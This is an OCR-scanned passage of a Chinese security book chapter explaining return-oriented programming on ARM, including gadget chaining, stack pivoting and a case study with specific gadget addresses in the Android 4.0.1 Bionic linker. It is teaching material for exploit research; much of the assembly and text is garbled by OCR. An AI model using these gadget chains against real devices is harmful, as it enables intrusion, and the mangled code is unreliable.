术 的 必要 性 。 与 x86 平 台 相 比 , ARM 架构 下 的 ROP 技术 有 着 较 大 的 差异 , 因此 本 章 会 介绍 ARM 
平台 相关 的 一 些 新 概念 。 本 章 以 bionic 动态 链接 库 这 个 相对 充裕 和 稳定 的 ROP 代码 源 为 例 来 进 
行 介绍 ， 并 提出 一 些 自动 化 的 思路 。 


9.1 历史 和 动机 


ROP 是 一 种 利用 内 存 中 现 有 原生 代码 作为 攻击 载荷 ， 而 不 是 注入 自 定 义 指令 载荷 ( 即 
shellcode ) 的 漏洞 利用 方法 。 已 经 有 许多 学 术 论 文 以 各 种 不 同 的 抽象 程度 对 其 进行 了 描述 ， 但 是 
这 一 技术 最 早 要 追溯 到 1997 年 Solar Designer 发 布 在 Bugtrap 邮件 列表 中 的 return2libe 技术 
( http://seclists.org/bugtraq/1997/Aug/63 )。 在 那 篇 文章 中 , Solar 演示 了 一 种 重用 现 有 x86 代码 片段 
来 绕 过 堆栈 不 可 执行 保护 机 制 的 方法 。 到 了 2000 年 5 月 ，Tim Newsham 在 他 的 Solaris 7 漏洞 利 
用 中 首次 演示 了 链接 超过 两 个 调用 的 方法 (http:/seclists.org/bugtraq/2000/May/90 )。 

在 ARM 环境 中 重用 已 有 原生 代码 并 使 用 ROP 利用 技术 , 有 如 下 三 个 主要 的 原因 。 首 先 , 最 
明显 的 原因 是 第 12 章 中 讨论 的 XN 保护 技术 。 第 二 ,是 ARM 架构 中 数据 和 指令 缓存 的 分 离 机 制 ， 
我 们 随后 会 提 到 。 最 后 ， 在 某 些 ARM 平台 上 ， 操 作 系 统 加 载 器 会 执行 “代码 签名 *”， 所 有 的 二 进 
制 文件 都 必须 使 用 密码 学 方法 进行 签名 。 这 种 平台 上 , 非 预期 代码 的 执行 ( 如 通过 利用 漏洞 引入 ) 
就 需要 使 用 ROP 技术 来 重用 已 有 代码 片段 。 

XN 保护 技术 让 操作 系统 能 够 将 内 存 页 标记 为 可 执行 或 不 可 执行 。 一 旦 标记 为 不 可 执行 内 存 
页 中 的 指令 被 执行 时 ， 处理 器 就 会 抛 出 异常 。 这样, 攻击 者 就 无 法 直接 将 控制 流动 持 到 内 存 中 的 
原生 代码 载荷 中 运行 。 攻击 者 必须 复 用 程序 可 执行 地 址 空间 内 的 现 有 代码 。 要 想 完全 控制 程序 执 
行 流 , 攻击 者 可 以 完全 通过 组 装 现 有 代码 的 片段 来 实现 , 也 可 以 只 通过 现 有 代码 片段 将 攻击 者 控 
制 的 内 存 标 记 为 可 执行 ， 然 后 执行 原生 代码 。 


代码 和 指令 缓存 分 离 
因为 ARM9 架构 包含 了 ARMv5 特性 ， 处 理 器 的 指令 和 数据 使 用 了 两 种 分 离 的 缓存 : 
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ARM9TDMI 采用 指令 和 数据 接口 分 离 的 哈佛 总 线 结构 ， 这 就 使 得 指令 和 数据 访问 
可 以 并 发 进行 ， 极 大 地 降低 了 处 理 器 的 CPI。 尽 管内 核 可 以 使 用 等 待 状态 来 支持 非 序 列 
化 访问 或 低速 内 存 系统 ,但 是 在 性 能 优化 方面 ,在 单 周期 内 实现 指令 和 数据 接口 的 内 存 
访问 是 必要 的 。 

基于 ARM9TDMI 的 处 理 器 ， 其 典型 实现 拥有 哈佛 结构 的 缓存 ， 在 缓存 上 使 用 了 相 
同 的 内 存 结构 ， 这 样 数 据 接口 就 可 以 访问 指令 的 内 存 空 间 。ARM940T 就 是 一 个 例子 。 
而 SRAM 的 系统 就 不 能 使 用 这 种 技术 了 ， 必 须 换 一 种 方式 。 

ARM 有 限 公司 ,《ARM9TDMIT™™M 技 术 参 考 手 册 》3.1 节 :“ 关 于 内 存 接口 "，1998。 
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0091a/CACFBCBE.html 





因此 ， 即 便 没有 XN 保护 机 制 ， 写 人 内 存 的 原生 指令 也 不 是 直接 可 执行 的 。 指 令 数据 最 初 被 
写 人 数据 缓存 ， 随 后 存 人 主 存 并 清空 缓存 。 如 网 9-1 所 示 : 
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图 9-1 数据 和 指令 缓存 


当 控制 流转 移 到 刚 写 入 的 指令 时 , 指令 解码 引擎 会 尝试 从 这 个 特定 地 址 取出 指令 , 并 首先 查 
询 指令 缓存 。 这 时 候 可 能 会 出 现 如 下 三 种 情况 。 
口 这 个 地 址 已 经 在 指令 缓存 中 ， 不 会 涉及 到 主 存 。 会 执行 原先 的 指令 ， 而 不 是 攻击 者 改写 
的 载荷 指令 。 
口 缓存 没有 命中 ， 就 从 主 存 中 取出 指令 ; 然而 ， 由 于 数据 缓存 并 没有 被 清空 ， 所 以 指令 是 
从 相应 内 存 位 置 取 得 的 、 攻 击 者 写 人 之 前 就 存在 的 数据 。 攻 击 者 的 载荷 指令 依然 没有 被 
执行 。 
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口 数据 缓存 已 经 被 清空 ， 同 时 指令 缓存 中 没有 这 个 地 址 。 此 时 指令 直接 从 主 存 中 取得 ， 攻 
击 者 的 载荷 指令 才 会 被 执行 。 
由 于 攻击 者 不 会 往 包 含 代码 的 地 址 空间 写 信 数据, 所 以 这 一 地 址 不 太 可 能 会 出 现在 指令 缓存 
中 。 然 而 ， 当 数据 缓存 还 没有 被 清空 时 ,仍然 无 法 正确 地 获取 攻击 载荷 指令 。 这 种 情况 下 ,攻击 
者 可 以 利用 存在 的 、 合 法 的 代码 〈 可 能 已 经 在 指令 缓存 中 )， 或 者 仅仅 写 和 很 多 数据 ， 来 清空 
据 缓存 。 实 施 这 种 利用 时 , 在 攻击 者 写 人 载荷 之 后 ,往往 不 太 可 能 再 写 人 很 多 数据 ， 所 以 重用 已 
有 代码 是 必要 的 方法 。 


























注意 在 开发 漏洞 利用 代码 时 ， 分 离 的 数据 和 指令 缓存 往往 会 带 来 很 大 的 麻烦 ， 难 以 识别 何 时 
应 该 从 调试 器 配置 切换 到 非 预 期 的 代码 执行 。 当 命中 断 点 或 者 切换 到 调试 器 进程 的 时 候 ， 
数据 缓存 通常 会 被 清空 。 调 试 器 只 看 到 主 存 中 的 内 存 ， 而 非 真 正 位 于 指令 缓存 的 内 存 。 
假如 目标 没有 带 着 调试 器 运行 ， 进 程 就 会 甬 溃 ， 就 像 是 攻击 者 的 载荷 那样 。 要 随时 注意 
这 种 原因 所 导致 的 异常 盘 溃 。 


ARM 处 理 器 有 一 些 特殊 的 指令 来 清空 缓存 .这 些 指令 修改 了 CP15 系统 控制 协 处 理 器 的 寄存 
器 。 不 幸 的 是 ， 这 些 指令 涉及 到 特权 寄存 器 的 访问 ， 因 此 不 能 在 用 户 模 式 下 运行 。PLI 指 令 也 可 
以 被 用 来 暗示 指令 缓存 需要 重新 加 载 ， 但 是 这 点 不 能 保证 被 执行 。 

操作 系统 使 用 系统 调用 来 提供 清空 指令 缓存 的 机 制 。 在 Linux 上 ， 相 关系 统 调用 可 以 做 到 这 
一 点 ， 也 可 以 直接 使 用 cacheflush 函数 。 通 常 ， 在 获得 任意 代码 执行 之 前 ， 是 不 可 能 调用 这 
种 函数 的 ; 但 是 ， 调 用 mprotect 函数 时 ，Linux Kernel 也 会 清空 缓存 。 这 样 就 可 以 忽略 缓存 分 
离 的 影响 ， 只 要 使 用 ROP 链 把 内 存 标记 为 可 执行 后 ， 攻 击 者 的 载荷 就 能 在 那里 执行 。 


9.2 ARM 架构 下 的 ROP 基础 


通常 来 说 ,目标 应 用 不 会 直接 包含 攻击 者 可 以 用 来 劫持 控制 流 的 一 整 块 代码 , 所 以 攻击 者 需 
要 通过 组 合 现 有 代码 片段 来 实现 完整 的 载荷 。 当 执行 完 一 个 代码 片段 之 后 , 要 继续 保持 对 程序 计 
数 器 的 控制 是 一 个 挑战 。 

早期 的 ret2libc 技术 在 x86 平 台 上 实现 了 将 一 个 或 多 个 libc 函数 调用 进行 串 接 。x86 架构 上 ， 
函数 的 返回 地 址 存储 在 栈 上 , 这 个 返回 地 址 指明 了 函数 返回 后 程序 应 该 在 哪里 执行 。 通 过 操纵 栈 
上 的 数据 ， 攻 击 者 可 以 提供 libc 函数 返回 后 调用 的 地 址 ， 用 来 殖 换 合法 的 函数 返回 地 址 。 

ROP 是 比 ret2libc 更 为 通用 的 技术 。ROP 不 仅 可 以 使 用 整个 函数 ， 还 可 以 使 用 程序 中 的 小 块 
代码 片段 , 称 为 gadget。 为 了 维持 对 程序 计数 器 的 控制 , 这 些 gadget 通常 以 函数 返回 指令 为 结尾 。 
攻击 者 可 以 选取 一 系列 gadget,， 来 组 合成 他 们 想 要 的 载荷 。 图 9-2 展示 了 如 何 组 合 这 些 gadget 来 
实现 攻击 者 的 载荷 。 
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gadget 栈 


mov rax, Ibx ; 
ret 

;地 址 1 
ov Tai rex 
ret 


call [rax] 
et 








地 址 2 








地 址 3 





图 9-2 x86 平 台 栈 上 的 ROP Gadget 链 


进一步 扩展 这 种 技术 , 你 可 以 使 用 任何 以 间接 跳 转 指令 结尾 的 gadget, 例如 间接 条 件 分 支 指 
令 或 者 从 寄存 器 读 取 的 分 支 指令 。 除了 相应 寄存 带 需 要 事先 加 载 好 下 一 个 gadget 的 地 址 外 , 这 个 
方法 与 ROP 非常 类 似 。 由 于 这 种 技术 非常 依赖 于 实际 可 用 的 gadget， 所 以 本 章 不 作 过 多 深入 介 


绍 。 





9.2.1 ARM 子 函 数 调用 


根据 ARM ABI (应 用 二 进 制 接口 ，ARM 平台 上 编译 后 软件 结构 的 标准 定义 )， 子 函数 的 返 
回 地 址 通常 不 存储 在 栈 上 , 返回 地 址 会 存在 特定 用 途 的 链接 寄存 器 中 。 通 过 bl 或 blx 指令 调用 
函数 时 ， 会 把 下 一 条 指令 的 地 址 存 和 人 LR 寄存 器 ， 之 后 才 会 开始 执行 函数 。 函 数 执行 完 后 ,使 用 
bx 1r 指令 来 返回 。 由 于 ARM 平台 下 的 程序 计数 器 (PC ) 是 可 以 像 其 他 寄存 器 那样 读 写 的 ， 所 
以 可 以 将 寄存 器 LR 中 的 值 复制 到 PC 寄存 器 中 。 因 此 ，mov pc，1r 指令 也 可 以 作为 有 效 的 函 

ARM 处 理 器 支持 两 种 主要 的 执行 模式 : ARM 和 Thumb 模式 ( 包含 Thumb2 扩展 )。 两 种 模 
式 间 的 切换 使 用 一 种 叫 作 Interworking 的 技术 。 例 如 ，bx lr 指令 会 查看 1r 寄存 器 的 最 低 比特 
位 : 如 果 是 1， 则 切换 到 Thumb 模式 ; 如 果 是 0， 则 切换 到 ARM 模式 。 实 际 上 ， 这 个 最 低位 存 
储 在 当前 程序 状态 寄存 器 (CPSR ) 中 的 第 五 个 比特 位 中 。 这 个 比特 被 称 为 下 bit， 决 定 了 处 理 央 
处 于 何 种 执行 模式 。 也 就 是 说 ， 如 果 程 序 要 调用 Thumb 模式 下 的 函数 ,那么 pl 和 blx 指令 就 
会 将 1r 寄存 器 的 最 低位 设置 为 1。 所 以 mov pc，1r 这 条 指令 只 能 用 在 调用 和 被 调用 函数 都 在 
ARM 模式 下 的 情形 。 在 ARMv6 桨 构 中 ， 现 代 编 译 器 只 会 为 隐 数 返回 生成 px 1r 指令 ， 因 为 这 
条 指令 和 mov pc，1r 没有 任何 性 能 差别 ， 如 图 9-3 所 示 。 
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图 9-3 ”函数 返回 的 Interworking 


读 到 这 里 ,漏洞 利用 开发 者 可 能 会 问 : 传统 x86 平 台 上 的 技术 依赖 于 覆盖 栈 上 的 返回 地 址 ， 
那 在 ARM 平 台 下 又 可 以 如 何 利用 简单 的 栈 溢 出 漏洞 呢 ? 对 于 leaf procedure 来 说 , 使 用 寄存 需 来 
存储 返回 地 址 非常 好 , 但 是 对 于 函数 又 想 调 用 其 他 子 函 数 的 情况 ,这 种 方法 是 不 行 的 。 为 了 实现 
这 一 点 ，ARM 编译 器 生成 的 代码 会 在 函数 入 口 之 前 把 1r 的 值 保存 在 栈 上 ， 在 在 执行 px 1r、 
返回 调用 函数 之 前 ， 从 栈 恢 复 1r， 如 下 面 的 代码 所 示 。 

调用 子 函 数 的 ARM 指令 















































etmida. Sl, {Ed < 1 # Store link register and callee-saved r4 on stack 
bl subroutine # Call subroutine, trashing link register 

ldmia sp!, {r4, lr} # Load original link register and r4 from stack 

bx 1r # Return to calling code 


Thumb 指令 使 用 了 一 些 特殊 的 push 和 pop 指令 ,来 隐 式 地 操作 SP 寄存 器 ( 栈 顶 指针 )， 
而 不 是 显 式 地 进行 引用 。Thumb 还 有 一 个 特殊 的 扩展 ，pop 指令 会 引用 PC 寄存 器 来 处 理 写 入 ， 
类 似 于 bx lr 指令。 这 种 方法 使 得 一 条 指令 就 能 触发 Interworking， 如 下 列 代 码 所 示 。 

Thumb 指令 调用 子 函 数 


push {1lr} # Store link register on stack 











bl subroutine # Call subroutine, trashing link register 


ee {pc} # Load original link register and return to calling code 

Thumb 指令 pop {pc} 非 常 类 似 x86 的 ret 指令 ， 它 会 从 栈 上 取出 地 址 继续 执行 。 最 大 区 别 
在 于 pop 指令 可 以 作为 函数 的 整个 结尾 (epilogue )， 除 了 PC 寄存 器 之 外 ,还 可 以 在 一 条 指令 中 
还 原 其 他 寄存 器 的 值 。Thumb 的 leaf routine 也 可 以 用 bx 1r 指令 结尾 ， 当 然 ，1r 中 必须 存 有 正 
确 的 值 。 








9.2.2 将 gadget 组 成 ROP 链 


记 住 , 你 的 目标 是 使 用 现 有 的 代码 序列 来 组 合成 攻击 载荷 。 如 果 攻 击 者 能 够 控制 栈 , 任何 以 
px 1r 或 者 pop {…， pc} 结 尾 的 指令 都 可 以 作为 gadget， 来 让 攻击 者 保持 对 程序 计数 器 的 控制 。 
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感谢 Interworking 机 制 , ARM 和 Thumb gadget 可 以 任意 地 进行 混合 。 唯一 的 例外 是 , 少数 gadget 
会 以 ARM 模式 的 mov pc，1r 结尾 ， 这 种 gadget 只 能 拼接 ARM 模式 的 gadget， 因 为 这 种 方式 
不 支持 Interworking 机 制 。 

使 用 lamia sp!，{…，1r} 从 栈 数据 还 原 1r， 然 后 bx 1r， 或 者 仅仅 使 用 pop {...，pc}， 
对 这 两 种 gadget 进行 组 合 是 非常 直接 的 方式 。 因 为 1r 是 从 栈 上 取得 的 下 一 个 地 址 ， 这 个 地 址 可 
以 通过 栈 来 提供 。 除 了 gadget 地 址 外 ,函数 结尾 时 需要 还 原 的 寄存 器 值 也 需要 在 栈 上 提供 ( 即使 
在 ROP 的 载荷 中 并 没有 用 到 它们 )， 因为 这 样 才 能 在 执行 下 一 个 gadget 的 时 候 , 让 栈 顶 指针 对 准 
这 个 位 置 。 如 果 下 一 个 gadget 使 用 Thumb 指令 ， 要 记得 将 地 址 最 低 比 特 设置 成 1， 来 通知 处 理 
器 切换 到 Thumb 模式 。 即 便 处 理 器 已 经 处 于 Thumb 模式 ， 也 需要 这 样 做 ; 否则 ， 如 果 地 址 最 低 
比特 为 0 的 话 ， 它 会 假设 调用 的 函数 是 ARM 模式 ， 处 理 器 就 会 切换 到 ARM 模式 。 

以 图 9-4 为 例 , 假设 你 可 以 利用 栈 溢出 漏洞 往 栈 上 写 任何 想 要 的 数据 (包括 null ), 程序 即将 
执行 pop {pc} 指 令 。 在 开启 了 堆栈 不 可 执行 保护 的 情况 下 ， 你 通过 调用 mprotect 水 数 将 栈 设 
置 为 可 执行 来 利用 这 个 漏洞 ， 然 后 原 地 执行 你 的 原生 代码 。 这 种 情况 下 ， 写 和 人 栈 的 载荷 会 如 图 
9-4 所 示 。 











































































































gadget 楼 
一 一 一 b00038cb 
pop {r0-r4, pc} ， r0 : 
2 
2 
工 3 
工 4 





' pc=b000... 


a 


图 9-4 简单 的 POP-ROP 链 


那些 叶 节 点 的 gadget， 即 以 bx 1r 结尾 而 前 面 没 有 恢复 LR 寄存 器 的 指令 ， 需 要 在 执行 之 前 
对 LR 寄存 器 值 进行 特殊 处 理 。 通 常 ，1z 中 包含 的 值 所 指向 的 gadget， 是 从 最 后 一 个 显 式 恢复 
LR 寄存 器 的 ARM gadget 中 得 到 的 ( 因为 ARM gadget 从 栈 恢 复 1r， 且 把 它 作为 下 一 个 gadget 
的 地 址 )。 如 果 一 个 函数 调用 了 一 个 子 函数 ， 那 么 1r 指向 了 子 函 数 调用 处 后 面 的 地 址 ， 这 会 带 
来 非 预期 的 行为 。 当 另外 一 个 以 bx 1r 结尾 的 gadget 被 执行 ， 程序 就 会 跳 转 到 上 面 所 说 的 子孙 
数 中 , 而 不 是 下 一 个 预期 的 gadget。 如 果 1r 能 够 指向 一 个 先前 所 用 过 的 gadget, 并 且 这 个 gadget 
没有 任何 破坏 副作用 ， 这 可 以 很 容易 地 通过 在 栈 上 放置 所 需 的 地 址 来 实现 。 但 是 如 果 1r 指向 了 
一 个 大 程序 或 者 一 个 不 能 被 执行 第 二 遍 的 gadget，1lz 的 值 就 必须 调整 。 找 一 个 恢复 1r 的 ARM 
gadget， 加 上 一 个 以 pop {pc} 指 令 结尾 的 Thumb gadget， 就 可 以 解决 这 个 问题 ， 如 图 9-5 所 示 。 
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ARM gadget 会 把 下 一 个 gadget 的 地 址 加 载 到 1r 中 ， 并 从 那 开 始 继续 执行 ; 下列 的 Thumb 
gadget 仅仅 跳 转 到 下 一 个 gadget。 这 样 ，1z 就 指向 了 一 个 Thumb gadget 来 实现 gadget 的 无 颖 连 
接 ， 任 何以 bx 1r 结尾 的 gadget 均 可 被 安全 地 执行 。 现 在 我 们 能 够 使 用 任意 函数 返回 指令 为 结 
尾 的 指令 序列 gadget。 











寄存 器 gadget 栈 
| bo000133c 
pop {ro0, 1r} ! 0 = ?3?9? 


bx 1r : ' 
! lr = b0002ab0 ! 
bo002ab0 人 























pop {pc} 














村 


图 9-5 设置 1r 指向 pop {pc} 


9.2.3 ”识别 潜在 的 gadget 


由 于 ARM 指令 是 对 齐 的 ， 所 以 只 能 使 用 有 意 生 成 的 代码 作为 gadget。 这 和 x86 架构 的 复杂 
指令 集 (CISC ) 有 区 别 。 在 x86 中 , 返回 指令 只 有 一 字 方 ， 所 以 很 有 可 能 跳 转 到 一 些 长 指令 的 
中 间 ， 其 中 恰巧 包含 一 个 与 返回 指令 相似 的 字 节 。 这 种 特性 使 得 x86 架构 拥有 更 多 gadget。 

在 精简 指令 集 (RISC ) 平台 上 去 寻找 可 用 的 gadget 是 非常 容易 的 。 对 于 对 齐 的 指令 来 说 ， 
只 需要 在 二 进 制 文件 中 搜索 能 够 返回 的 指令 ， 例 如 pop {...，pc}， 之 后 在 反 汇 编列 表 ( dead 
listing ) 中 检查 这 些 返 回 指令 之 前 的 指令 即 可 。 因 此 ， 我们 可 以 首先 创建 一 个 ARM 和 Thumb 
的 反 汇 编列 表 ， 然 后 用 正则 表达 式 进 行 解析 。 用 这 种 方法 寻找 gadget 非常 容易 。 本 章 编 写 了 
个 脚本 来 创建 ROP 链 。 

与 在 x86 下 跳 转 到 长 指令 中 间 开 始 执 行 类 似 , 在 ARM 下 也 有 一 个 技巧 : ARM 模式 和 Thumb 
模式 是 可 以 自由 切换 的 , 可 以 把 已 有 的 ARM 指令 当 作 Thumb 指令 来 执行 , 反之 亦 然 。 虽然 这 种 
技巧 不 会 种 来 多 于 2 条 指令 的 gadget， 但 是 ARM 指令 中 的 2 字 节 往往 能 够 提供 pop 1{...，pc} 
这 种 非常 有 用 的 Thumb 指令 。 这 些 指 令 通 常 能 够 从 栈 上 还 原 一 些 普通 函数 结尾 中 不 会 出 现 的 寄 
存 器 , 例如 需要 调用 者 来 保存 的 r0~r3, 甚至 栈 顶 指针 。Thumb 和 ARM 指令 的 分 解 示 例如 图 9-6 
所 示 。 

另外 , 异常 处 理 和 进程 初始 化 过 程 的 代码 中 可 能 会 存在 大 量 有 用 的 gadget。 这 些 指令 都 是 用 
汇编 来 实现 的 ， 专 门 用 来 处 理 底层 架构 相关 的 组 件 。C 库 、 动 态 链 接 器 中 会 出 现 这 样 的 gadget， 
下 一 节 中 我 们 就 将 介绍 。 
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ldclt 0,cr6,[pe:#-100] 



































三 ~ 
“tf" 条 件 “dc 指令 标志 “pe” 
国 
P 定 
祭 
1011 110 (1) 000 1 1111 
\ J 人 芝 
ARM 这 
Thumb 0xbf Ox1f 0x60 0x19 
1011 110 11 000 11111 
Thumb “pop" 指 令 | fpc} 不 选取 {75-r7}) | {r0-r4} 
\ J 
YY 


pop{r0-r4,pe} 
图 9-6 从 ARM 指令 中 分 解 出 的 Thumb pop 指令 


9.3 ”案例 分 析 : Android 4.0.1 链接 器 


由 于 Android 中 的 大 多 数 进程 都 是 从 Zygote 进程 fork 而 来 的 ， 所 以 它们 共享 了 很 多 库 。 对 
于 那些 不 是 从 Zygote 进程 fork 出 来 的 进程 ， 内 存 布局 就 可 能 有 比较 大 的 差异 ， 一 个 典型 的 例子 
是 将 在 第 11 章 中 讨论 的 无 线 接口 层 进程 (rild )。 不 过 这 些 进程 也 是 动态 链接 的 ， 因 此 所 有 进程 
的 地 址 空间 中 都 有 一 段 相 同 的 代码 内 存 映 射 : 动态 链接 器 。 这 段 代码 用 来 递归 解析 二 进 制程 序 中 
的 所 有 依赖 , 然后 解析 从 其 他 库 中 导入 的 符号 并 调整 相应 的 地 址 。 对 于 未 被 移入 预期 基 址 的 二 进 
制 文件 , 例如 由 实现 地 址 空间 布局 随机 化 (ASLR ) 所 导致 的 , 动态 链接 器 还 会 负责 对 其 重 定位 。 

在 Android 4.0 系统 以 及 更 早 的 版 本 中 , Bionic 动态 链接 器 被 映射 到 静态 地 址 0xb0001000 中 。 
因此 ， 不 需要 任何 信息 泄露 就 能 构造 ROP 载荷 。Android 4.1 系统 中 ， 动 态 链接 器 的 基 址 像 其 他 
二 进 制 程序 那样 被 随机 化 了 ， 第 12 章 会 进行 讨论 。 

动态 链接 需 存 在 于 所 有 进程 之 中 , 并 且 在 老 版 本 Android 系统 中 有 一 个 固定 基 址 ; 除 此 之 外 ， 
它 还 是 一 个 相当 稳定 的 二 进 制程 序 ， 并 不 会 像 其 他 库 那 样 发 生 很 大 的 变化 。Android 进程 中 的 大 
多 数 库 在 不 同 手机 、 甚 至 相同 Android 版 本 的 不 同 固件 (ROM ) 中 有 很 大 差异 ， 而 动态 链接 库 却 
非常 固定 。 可 能 是 因为 动态 链接 器 非常 关键 和 敏感 ， 开 发 者 总 是 使 用 Android 源码 中 的 预 编译 工 
具 来 编译 ,不 对 其 作 任 何 代码 修改 。 注 意 , 动态 链接 器 的 低地 址 当中 包含 一 个 Bionic memcpy 郴 
数 的 实现 。 由 于 memcpy 针对 目标 架构 有 较 大 的 优化 ， 所 以 在 不 同 的 处 理 嚣 上， 指令 流 的 偏 移 会 
出 现 一 些 细微 差异 。 这 就 导致 链接 器 当中 ROP gadget 的 地 址 与 特定 处 理 器 相对 应 。 

出 于 以 上 原因 ， 动 态 链接 库 是 构造 ROP 链 的 完美 目标 ， 使 其 可 以 尽 可 能 多 地 得 到 重用 。 本 
章 以 搭载 Android 4.0.1 系统 的 Galaxy Nexus 中 的 动态 链接 器 作为 案例 ， 学 习 构 造 ROP 链 ， 并 作 
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为 第 8 章 中 WebKit 漏洞 利用 的 延续 。 

由 于 Android 系统 并 没有 对 可 执行 代码 的 内 存 映 射 进行 签名 ， 所 以 攻击 者 可 以 使 用 ROP 链 
分 配 一 页 ( 4096 字 节 ) 可 执行 的 内 存 ， 然 后 把 准备 的 原生 载荷 复制 过 来 ， 跳 转 过 去 执行 。 使 用 
这 种 方法 就 能 够 比较 通用 地 运行 任意 用 户 空间 的 载荷 。 


9.3.1 迁移 栈 指针 


运行 ROP 载荷 的 第 一 步 ， 通常 是 把 栈 顶 指针 指向 攻击 者 控制 的 数据 ， 例 如 堆 。 这 一 步 也 被 
称 作 迁 移 (Pivoting )。 当 利用 栈 缓冲 区 溢出 漏洞 的 时 候 ， 栈 顶 指 针 往 往 距离 ROP 载荷 很 近 ， 所 
以 迁移 非常 简单 。 如 果 攻 击 者 控制 的 数据 在 堆 上 ， 栈 迁移 就 是 构造 可 用 ROP 链 过 程 中 最 有 挑战 
的 任务 之 一 。 

回 到 第 8 章 的 例子 ， 假 设 我 们 已 经 通过 劫持 Renderobject 类 中 的 虚 表 指针 和 伪造 对 应 的 
虚 函 数 表 控 制 了 程序 计数 器 。 即 便 在 其 他 情况 下 〈 例如 主 堆 上 一 般 性 的 释放 后 重用 漏洞 )， 将 栈 
迁移 到 堆 上 也 是 有 必要 的 。 我 们 会 介绍 一 种 通用 的 方法 ,而 对 于 利用 漏洞 的 不 同情 况 ， 可 能 会 有 
更 加 合适 的 技术 。 一 个 例子 是 ， 如 果 栈 上 存在 堆 的 指针 ,那么 这 个 指针 就 能 用 作 栈 帧 指针 ,， 在 函 
数 结束 的 时 候 还 原 栈 顶 指针 ， 实 现 栈 到 堆 的 迁移 。 

在 链接 器 中 存在 一 个 非常 有 趣 的 gadget, 它 可 以 将 所 有 寄存 右 设 置 成 用 户 定 义 的 值 。 我 们 称 
之 为 master gadget， 它 威力 巨大 , 已 经 被 多 个 漏洞 利用 编写 者 用 于 未 公开 的 漏洞 利用 代码 中 。 这 
个 gadget 是 未 使 用 的 异常 处 理 代 码 的 一 部 分 ， 在 Android 4.0.1 中 如 下 所 示 
















































































.text:B0002868 EXPORT dl_restore_ core_ regs 
.text:B0002868 

.text:B0002868 ADD R1, RO, #0x34 
.text:B000286C LDMIA R1, {R3-R5} 
.text:B0002870 STMFD SP!, {R3-R5} 
.text:B0002874 LDMIA RO, {RO-R11} 
.text:B0002878 LDMF'D SP, {SP-PC} 
.text:B0002878 ; End of function dl_restore_ core_ regs 





它 的 强大 在 于 有 多 个 可 用 入 口 点 ， 每 个 入 口 点 都 对 应 一 个 gadget。 

口 使 用 0xb0002878 作为 gadget 的 起 始 地 址 ， 栈 顶 指针 、1lr 和 新 的 程序 计数 器 会 从 当前 栈 
中 载 入 。 当 栈 顶 的 局 部 变量 可 以 被 用 户 控 制 时 ， 这 个 gadget 就 会 非常 有 用 ,但 是 针对 不 
同 的 bug， 效 果 有 较 大 差异 。 

口 跳 转 到 0xb0002870 时 ，r3、r4 和 r5 寄存 器 的 值 会 存储 在 栈 顶 上 ， 然 后 sp 、1z 和 pc 
会 从 栈 顶 中 的 数据 恢复 。 当 r4 指向 用 户 控制 的 数据 ，r5 指向 有 效 代 码 (例如 ， 漏 洞 场 
景 中 的 一 个 函数 指针 ) 时 ， 这 个 gadget 会 很 有 用 。 

口 放松 上 面 几 种 较为 严格 的 要 求 , 可 以 跳 转 到 0xb000286c, 并 从 r1 指向 的 内 存 中 加 载 sp、 
lr 和 pc。 这 可 以 通过 漏洞 让 内 存 中 已 存在 的 对 象 中 的 指针 指向 用 户 控制 的 数据 ， 并 控 
制 第 一 个 DWORD 来 实现 , 或 者 当 zl 指向 的 内 存 可 以 被 用 户 完全 控制 时 ，sp 就 可 以 比 
较 可 靠 地 从 那里 取得 。 这 是 一 个 特别 有 趣 的 gadget。 编 译 器 生成 的 代码 在 调用 没有 参数 
的 虚 函 数 时 ,通常 会 将 虚 函 数 表 指 针 存 人 r1。 因 为 在 这 种 情况 下 ,需要 伪造 虚 函 数 表 来 
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控制 bc, 所 以 通过 使 用 这 个 栈 迁 移 的 gadget, 也 有 可 能 同时 控制 第 一 个 双 字 ( DWORD )， 


进而 控制 sp。 


口 最 后 ， 当 跳 转 到 0xb0002868 来 使 用 整个 函数 作为 栈 迁 移 的 gadget 时 ， 


的 内 存 加 上 0x34 的 偏 移 来 载 入 。 


有 用 。 对 于 所 有 支持 的 虚 函 数 调 用 ， 




















sp 可 以 从 r0 指向 
尽管 这 个 偏 移 看 起 来 很 随机 ， 但 是 在 真实 案例 中 却 非常 
r0 会 存储 this 指针 ， 这 样 就 可 以 通过 成 员 变 量 来 












































控制 偏 移 0x34 处 的 数据 。 
如 果 master gadget 提供 的 几 种 栈 迁 移 方式 都 不 适用 ， 该 函数 调用 点 还 提供 了 其 他 选项 : 
.text:B0002348 ADD RO, SP, #0x24C 
.text :B000234C BL dl_restore_ core_ regs 
.text :B00023D0 ADD RO, R4, #4 
.text :B00023D4 BL dl_restore_core_ regs 
.text:BO0024F0 ADD RO, R5, #4 
.text :B00024F4 BL dl_restore_ core_ regs 





使 用 上 面 这 些 地 址 ， 你 也 可 以 通过 解 引用 x4 + 0x38，r5 + 0x38 以 及 当前 栈 下 方 的 值 来 
加 载 sp。 

将 栈 顶 指针 指向 任意 用 户 控制 的 数据 后 ， 就 可 以 构造 足够 长 的 ROP 链 ， 来 分 配 可 执行 的 内 
存 ， 然 后 将 载荷 复制 进去 ， 最 后 将 控制 流 重 定向 到 那里 执行 。 


9.3.2 ”在 新 映射 内 存 中 执行 任意 代码 


现在 已 经 控制 了 栈 顶 指针 和 栈 上 的 数据 , 下 面 就 可 以 通过 提供 一 系列 gadget 地 址 来 让 它们 依 
次 执行 。 因 为 链接 器 中 提供 的 gadget 是 非常 有 限 的 ， 而 且 为 每 个 载荷 构造 针对 目标 的 ROP 链 相 
当 麻 烦 ， 所 以 需要 使 用 通用 的 方法 来 分 配 一 段 可 执行 的 内 存 ， 然 后 在 那里 执行 原生 代码 。 这 种 
ROP 链 通常 被 称 作 ROP stager。 

我 们 的 首要 目标 是 分 配 可 执行 的 内 存 ， 这 样 就 能 够 在 有 XN 保护 的 情况 下 执行 任意 代码 。 在 
Linux 上 , 内 存 页 是 通过 mmap 系统 调用 来 分 配 的 。 幸 运 的 是 , 链接 器 中 包含 了 完整 的 Bionic mmap 
实现 ， 在 例 中 位 于 0xb0001678。mmap 函数 需要 6 个 参数 。 根 据 Android 的 EABI 标 准 ， 前 4 个 
参数 通过 r0 ~ r3 来 传递 ， 最 后 两 个 通过 栈 来 传递 。 因 此 ， 需 要 一 个 gadget 将 *0 ~ r3 初始 化 成 
想 要 的 值 。 一 个 可 用 的 gadget 如 下 : 


. text :B00038CA 






























































POP {RO-R4, PC} 


